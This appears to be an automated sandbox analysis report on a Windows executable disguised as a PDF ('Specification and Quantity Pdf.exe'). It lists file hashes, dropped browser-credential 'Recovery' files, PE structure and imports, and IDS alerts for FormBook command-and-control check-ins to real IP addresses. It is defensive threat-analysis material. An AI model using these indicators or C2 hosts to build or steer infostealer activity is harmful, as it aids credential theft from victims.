SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zz3oqrr.eh2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5ourtqv.q22.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp25duew.0m1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z55mdlwf.clt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogim.jpeg

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	74860
Entropy (8bit):	7.816299100841257
Encrypted:	false
SSDEEP:	1536:Cj53V290bbegk8E9AOB9bCK4NHjTmPJALBRF5HduZB9VR9A:w5F290byz8E9xCKgnmPJ2BRVuZXD9A
MD5:	286E56B78D6090A3D50782AED29123C2
SHA1:	9EBEC4137F9183AC1C85B82A726908D94201F00E
SHA-256:	10CF66030D61D75C044CF0B0FF89E64B44C351C514146F7CF8CA9350BCC43EAA
SHA-512:	15478E1DB156CBD508E3728B01195D4C0E00ED75ADD3A7893EE39D73F1665B2B6B33A4584F08CC7CD0DA3C2E799117986A8847BBD9EF03CFECF3FD3B1B83036A
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogrg.ini

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.ini

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogrv.ini

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.96096404744368
Encrypted:	false
SSDEEP:	3:AJlbeGQJhIl:tGQPY
MD5:	BA3B6BC807D4F76794C4B81B09BB9BA5
SHA1:	24CB89501F0212FF3095ECC0ABA97DD563718FB1
SHA-256:	6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
SHA-512:	ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

C:\Users\user\Specification and Quantity Pdf.exe

Download File

Process:	C:\Users\user\Desktop\Specification and Quantity Pdf.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1678432
Entropy (8bit):	7.036542189115781
Encrypted:	false
SSDEEP:	49152:YAodtaG9kS2U84B+FLan9k5TRM9zlxVjZfjQq:I/B13fjQq
MD5:	686FED0AF9EEBB2581701D4E08E9FF0B
SHA1:	3C9F400BA8C6FE7F35F20BCA09E59D3BB8169035
SHA-256:	219A330B7AE9807411D289F28169861FC748F50212AE2317278BFE155D89990F
SHA-512:	178D525F08B12CCCA7C2A11F230E4BD83B74D28D17F15C13696937F57E4272AA34B0542ACA6890E032FF7D4732BE426EF00DCC54ADCEB70BD71F05CBD6D6BB00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E..E...D...E...D...E...E...E...DD..EI..D...EI..D...E................PE..d......f.........."....).n..........,..........@....................................x.....`.............................................\...............>............~..`............Z..T....................]..(....Y..@............................................text............................... ..`.managed(z.......\|.................. ..`hydrated.................................rdata..jl.......n...r..............@..@.data...............................@....pdata..............................@..@.rsrc...>...........................@..@.reloc...............x..............@..B................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.036542189115781
TrID:	Win64 Executable GUI (202006/5) 77.37% InstallShield setup (43055/19) 16.49% Win64 Executable (generic) (12005/4) 4.60% Generic Win/DOS Executable (2004/3) 0.77% DOS Executable Generic (2002/1) 0.77%
File name:	Specification and Quantity Pdf.exe
File size:	1'678'432 bytes
MD5:	686fed0af9eebb2581701d4e08e9ff0b
SHA1:	3c9f400ba8c6fe7f35f20bca09e59d3bb8169035
SHA256:	219a330b7ae9807411d289f28169861fc748f50212ae2317278bfe155d89990f
SHA512:	178d525f08b12ccca7c2a11f230e4bd83b74d28d17f15c13696937f57e4272aa34b0542aca6890e032ff7d4732be426ef00dcc54adceb70bd71f05cbd6d6bb00
SSDEEP:	49152:YAodtaG9kS2U84B+FLan9k5TRM9zlxVjZfjQq:I/B13fjQq
TLSH:	E675CF15E3A811E8D42BC634CA619633E6B179561B21B4CF0B99E3452F73EE26B7F301
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............

File Icon


Icon Hash:	3c73b3af8bece413

Static PE Info

General

Entrypoint:	0x14006ac2c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	22a65106d3d84ea74d966fa0424a5a0c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	19/09/2024 08:22:43 19/09/2025 08:22:43
Subject Chain	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Version:	3
Thumbprint MD5:	A467469A816221D8A64572479156FF8A
Thumbprint SHA-1:	8F7AFC79668EE61CCA9DEB12DB3B7FE0B2F61BAA
Thumbprint SHA-256:	0F0691436E3DE9E079C7ADCF4D6FA538217AB742E144127111A535CEAE48BB42
Serial:	1CCEA94EBBFBF04721E7CDBA6E184DD9

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F3D38DC206Ch
dec eax
add esp, 28h
jmp 00007F3D38DC1897h
int3
int3
jmp 00007F3D38DC23E8h
int3
int3
int3
dec eax
sub esp, 28h
call 00007F3D38DC23E4h
jmp 00007F3D38DC1A24h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F3D38DC1A0Ch
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F3D38DC1A32h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F3D38DC1A35h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F3D38DC1A2Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F3D38DC1A36h
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
cmp ecx, dword ptr [00000049h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x17f3c0	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17f41c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19c000	0x3b03e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x18f000	0xcdec	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x197e00	0x1e60	.pdata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d8000	0x5b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x165ae0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x165d00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1659a0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11a000	0x6a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6f188	0x6f200	16824105689e93571b28f6d652acf3f1	False	0.45466728768278963	data	6.6338226603175485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x71000	0x77a28	0x77c00	459fe8e4d0429964edfb07e39e66b232	False	0.46850331093423797	data	6.473781869755907	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated	0xe9000	0x30498	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x11a000	0x66c6a	0x66e00	30e6b6bb7e33da15f5f4a60447b3313a	False	0.48810088851761846	data	6.702682768000056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x181000	0xd5a8	0x1800	9d5075bd44b367f703d8e922b003398a	False	0.2294921875	data	3.190641782829915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x18f000	0xcdec	0xce00	638451eb673a6cdf25f666b19f1b8bb4	False	0.49419751213592233	data	6.064103613023274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x19c000	0x3b03e	0x3b200	1a4c17201a89cfbf512530447d107f42	False	0.8662625528541226	data	7.653977979726921	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d8000	0x5b8	0x600	adcf9b9e4d3994d1018ad464f4f1db74	False	0.5826822916666666	data	5.215191968056739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
BINARY	0x19c3c4	0x2e4a4	data	1.0003480939220692
RT_ICON	0x1ca868	0x800	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	0.279296875
RT_ICON	0x1cb068	0x400	Device independent bitmap graphic, 32 x 64 x 4, image size 512	0.318359375
RT_ICON	0x1cb468	0x200	Device independent bitmap graphic, 16 x 32 x 4, image size 128	0.314453125
RT_ICON	0x1cb668	0x1000	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.49853515625
RT_ICON	0x1cc668	0xa00	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.5859375
RT_ICON	0x1cd068	0x800	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.57373046875
RT_ICON	0x1cd868	0x600	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.421875
RT_ICON	0x1cde68	0x4400	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.2546530330882353
RT_ICON	0x1d2268	0x2600	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.43246299342105265
RT_ICON	0x1d4868	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.4144965277777778
RT_ICON	0x1d5a68	0xa00	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.54609375
RT_ICON	0x1d6468	0x600	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.4654947916666667
RT_GROUP_ICON	0x1d6a68	0xae	data	0.5459770114942529
RT_VERSION	0x1d6b18	0x33c	data	0.3780193236714976
RT_MANIFEST	0x1d6e54	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
ole32.dll	CoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
api-ms-win-crt-heap-l1-1-0.dll	malloc, free, _callnewh, calloc, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-string-l1-1-0.dll	strcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
api-ms-win-crt-convert-l1-1-0.dll	strtoull
api-ms-win-crt-runtime-l1-1-0.dll	__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-22T17:27:13.393340+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49713	23.227.38.74	80	TCP
2024-09-22T17:27:13.393340+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49713	23.227.38.74	80	TCP
2024-09-22T17:27:13.393340+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49713	23.227.38.74	80	TCP
2024-09-22T17:27:13.456161+0200	2829004	ETPRO MALWARE FormBook CnC Checkin (POST)	1	192.168.2.7	49714	23.227.38.74	80	TCP
2024-09-22T17:28:14.376902+0200	2829004	ETPRO MALWARE FormBook CnC Checkin (POST)	1	192.168.2.7	49715	203.161.60.191	80	TCP
2024-09-22T17:29:39.690092+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49716	78.46.88.140	80	TCP
2024-09-22T17:29:39.690092+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49716	78.46.88.140	80	TCP
2024-09-22T17:29:39.690092+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49716	78.46.88.140	80	TCP
2024-09-22T17:29:41.658867+0200	2829004	ETPRO MALWARE FormBook CnC Checkin (POST)	1	192.168.2.7	49717	78.46.88.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2024 17:27:12.210124969 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:12.236356974 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:12.236434937 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:12.236576080 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:12.261719942 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:12.739582062 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:12.740617037 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.192573071 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.393188000 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.393207073 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.393219948 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.393285990 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.393340111 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.397914886 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397929907 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397941113 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397950888 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397960901 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397969961 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397979021 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.397981882 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.397985935 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.397994995 CEST	80	49713	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.398022890 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.398035049 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.398056984 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.398056984 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.398099899 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.398117065 CEST	49713	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.399496078 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.405731916 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.405793905 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.407049894 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.407059908 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.407069921 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.407078981 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.407118082 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.407138109 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.409488916 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.409501076 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.409511089 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.409543991 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.409547091 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.409567118 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.409589052 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.409799099 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.409862041 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.410933971 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.411035061 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.411086082 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.411943913 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.412064075 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.412085056 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.412096024 CEST	80	49714	23.227.38.74	192.168.2.7
